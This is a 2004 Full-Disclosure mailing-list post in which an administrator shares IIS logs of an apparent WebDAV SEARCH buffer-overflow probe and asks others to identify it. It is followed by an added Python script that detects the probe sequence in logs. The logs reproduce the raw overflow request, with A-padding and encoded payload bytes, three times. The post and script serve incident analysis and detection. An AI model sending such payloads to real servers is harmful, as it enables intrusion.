Full Disclosure mailing list archives
Exploit Identification Request
From: "System Administrator" <root () transientimages com>
Date: Thu, 29 Apr 2004 06:34:41 -0700
Folks: One of our external systems (W2k, fully patched all components - sp4, sql sp4, mdac sp3, post hotfixes, etc) is being hit by what appears to be a buffer overflow of IIS: 4096 bytes cycling in what appears to be an attempt to execute code. The probe starts by obtaining an index.asp page, and then drops a "SEARCH / 411 210 42" before dropping the "AAAAA<n>" string. I've checked the SEARCH unicode against google (nothing) and k-otic's current exploits (nada) and dshield tables (nada). Can anyone assist in identification of the exploit\overrun attempt?

Thanks,
Oliver

2004-04-28 21:12:38 x.x.88.247 GET /index.asp 200 0 189 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98) -
2004-04-28 21:12:38 x.x.88.247 SEARCH / 411 210 42 - -
2004-04-28 21:12:45 x.x.88.247 SEARCH /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAA?????????????????????????????????????####?????????? rmomddddddisjhnegdddddddlohddplokdepnqlojldlloskjndiimrlimddddddrfs mlgrpehggpdidjlfrjikljijljljskgkhjlipkgkjjgloqpidjndjjndfididjldddd ddhdigssejlgslsskhfmlosljnddlopjlgpdelidloilspiglgpddhidikssijdhidi kssijdlillipdkhdmloqpggpdidigssijdpssijedieijlohigploihflkldgqiiflo kffddgsiggpmhmhenqdgpiggqodsoredgnqjkhdlpepodqdgqnhdrosegoeskirkinl oinfhdgqqjjlodpholoinepdgqqlodhlodgpinoirimpgrlhfssssssniekddkpeskm dnrlsomksqdsmlsrlndrrsprrdjdddgfddddddddddddhqinmddddgdddddddhddddd dssssddddolddddddddddddddhddddddddddddddddddddddddddddddddddddddddd ddddddddddddddddddddddddddddddrldddddddresondrddohdmpqfeoldehppqfei hjljmkgfdkdkfjsjkkfjejqfdjgjejrjrjskhfdjfjifdkfkijrfdjmjrfd
2004-04-28 21:12:51 217.185.88.247 SEARCH /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAA?????????????????????????????????????####?????????? rmomddddddisjhnegdddddddlohddplokdepnqlojldlloskjndiimrlimddddddrfs mlgrpehggpdidjlfrjikljijljljskgkhjlipkgkjjgloqpidjndjjndfididjldddd ddhdigssejlgslsskhfmlosljnddlopjlgpdelidloilspiglgpddhidikssijdhidi kssijdlillipdkhdmloqpggpdidigssijdpssijedieijlohigploihflkldgqiiflo kffddgsiggpmhmhenqdgpiggqodsoredgnqjkhdlpepodqdgqnhdrosegoeskirkinl oinfhdgqqjjlodpholoinepdgqqlodhlodgpinoirimpgrlhfssssssniekddkpeskm dnrlsomksqdsmlsrlndrrsprrdjdddgfddddddddddddhqinmddddgdddddddhddddd dssssddddolddddddddddddddhddddddddddddddddddddddddddddddddddddddddd ddddddddddddddddddddddddddddddrldddddddresondrddohdmpqfeoldehppqfei hjljmkgfdkdkfjsjkkfjejqfdjgjejrjrjskhfdjfjifdkfkijrfdjmjrf
2004-04-28 21:13:01 217.185.198.113 GET /index.asp 200 0 189 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98) -
2004-04-28 21:13:04 217.185.198.113 SEARCH / 411 210 42 - -
2004-04-28 21:13:27 217.185.198.113 SEARCH /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAA?????????????????????????????????????####?????????? rmomddddddisjhnegdddddddlohddplokdepnqlojldlloskjndiimrlimddddddrfs mlgrpehggpdidjlfrjikljijljljskgkhjlipkgkjjgloqpidjndjjndfididjldddd ddhdigssejlgslsskhfmlosljnddlopjlgpdelidloilspiglgpddhidikssijdhidi kssijdlillipdkhdmloqpggpdidigssijdpssijedieijlohigploihflkldgqiiflo kffddgsiggpmhmhenqdgpiggqodsoredgnqjkhdlpepodqdgqnhdrosegoeskirkinl oinfhdgqqjjlodpholoinepdgqqlodhlodgpinoirimpgrlhfssssssniekddkpeskm dnrlsomksqdsmlsrlndrrsprrdjdddgfddddddddddddhqinmddddgdddddddhddddd dssssddddolddddddddddddddhddddddddddddddddddddddddddddddddddddddddd ddddddddddddddddddddddddddddddrldddddddresondrddohdmpqfeoldehppqfei hjljmkgfdkdkfjsjkkfjejqfdjgjejrjrjskhfdjfjifdkfkijrfdjmjrf

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
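A defender reading this thread would want to pull the same three-step sequence (GET /index.asp, a bare "SEARCH /" answered 411, then a SEARCH whose URI is padded with a long run of one byte) out of IIS logs automatically. The script below is an added example, not part of the post or any reply; its log lines are constructed to mirror the layout above, with placeholder client IPs, a trimmed user-agent, and the 4096-byte filler shortened to 80 'A's.

```python
import re
from collections import defaultdict

# Constructed sample IIS log lines mirroring the layout in the post: placeholder
# client IPs, the user-agent trimmed, and the 4096-byte filler shortened to 80 'A's.
SAMPLE_LOG = """\
2004-04-28 21:12:38 192.0.2.10 GET /index.asp 200 0 189 Mozilla/4.0 -
2004-04-28 21:12:38 192.0.2.10 SEARCH / 411 210 42 - -
2004-04-28 21:12:45 192.0.2.10 SEARCH /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2004-04-28 21:13:01 198.51.100.7 GET /index.asp 200 0 189 Mozilla/4.0 -
2004-04-28 21:13:05 198.51.100.7 PROPFIND /docs/ 207 0 0 - -
"""

# date time client-ip method uri [status]; the overflow request in the post logged
# no status at all, so the status field is optional.
LINE_RE = re.compile(r"^(\S+ \S+) (\S+) (\S+) (\S+)(?: (\d{3}))?")
FILLER_RE = re.compile(r"(.)\1{63,}")  # 64 or more copies of one byte, e.g. 'AAAA...'

def parse(line):
    m = LINE_RE.match(line)
    if not m:
        return None
    ts, ip, method, uri, status = m.groups()
    return {"ts": ts, "ip": ip, "method": method, "uri": uri,
            "status": int(status) if status else None}

def suspicious_search(entry, max_uri=256):
    """A WebDAV SEARCH whose URI is oversized or padded with a repeated byte."""
    if entry is None or entry["method"] != "SEARCH":
        return False
    return len(entry["uri"]) > max_uri or FILLER_RE.search(entry["uri"]) is not None

def find_probe_sequences(log_text):
    """Return client IPs that follow the three-step pattern described in the post:
    GET /index.asp, then a bare 'SEARCH /' answered 411, then a padded SEARCH."""
    step = defaultdict(int)      # ip -> how many steps of the pattern seen so far
    hits = []
    for raw in log_text.splitlines():
        e = parse(raw)
        if e is None:
            continue
        ip = e["ip"]
        if step[ip] == 0 and e["method"] == "GET" and e["uri"] == "/index.asp":
            step[ip] = 1
        elif step[ip] == 1 and e["method"] == "SEARCH" and e["uri"] == "/" and e["status"] == 411:
            step[ip] = 2
        elif step[ip] == 2 and suspicious_search(e):
            hits.append(ip)
            step[ip] = 0
    return hits

if __name__ == "__main__":
    print(find_probe_sequences(SAMPLE_LOG))   # ['192.0.2.10']
```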